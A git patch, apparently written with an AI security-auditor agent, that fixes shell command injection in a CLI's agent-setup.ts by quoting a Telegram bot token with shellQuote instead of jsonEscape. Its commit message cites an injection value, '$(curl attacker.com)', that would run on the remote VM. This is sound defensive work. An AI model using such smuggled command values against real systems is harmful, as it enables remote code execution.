From 370afb631c755ca2a0adc4e018442741faf5efbb Mon Sep 17 00:00:00 2001 From: A <258483684+la14-1@users.noreply.github.com> Date: Thu, 12 Mar 2026 22:51:33 -0700 Subject: [PATCH] security: use shellQuote for Telegram bot token in shell command (#2561) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit jsonEscape() produces double-quoted strings ("value") which allow shell command substitution $(...) inside bash. A malicious TELEGRAM_BOT_TOKEN like "$(curl attacker.com)" would execute on the remote VM when openclaw config is set. shellQuote() uses POSIX single-quote escaping which prevents all shell expansion. Every other user-supplied value in agent-setup.ts (GITHUB_TOKEN, git user.name, git user.email) correctly uses shellQuote — the bot token was the only exception. Agent: security-auditor Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.5 --- packages/cli/src/shared/agent-setup.ts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/packages/cli/src/shared/agent-setup.ts b/packages/cli/src/shared/agent-setup.ts index eafbf6b9..4c56e71b 100644 --- a/packages/cli/src/shared/agent-setup.ts +++ b/packages/cli/src/shared/agent-setup.ts @@ -378,7 +378,7 @@ async function setupOpenclawConfig( const trimmedToken = envToken?.trim() || (await prompt("Telegram bot token: ")).trim(); if (trimmedToken) { - const escapedBotToken = jsonEscape(trimmedToken); + const escapedBotToken = shellQuote(trimmedToken); const telegramResult = await asyncTryCatchIf(isOperationalError, () => runner.runServer( "export PATH=$HOME/.npm-global/bin:$HOME/.bun/bin:$HOME/.local/bin:$PATH; " +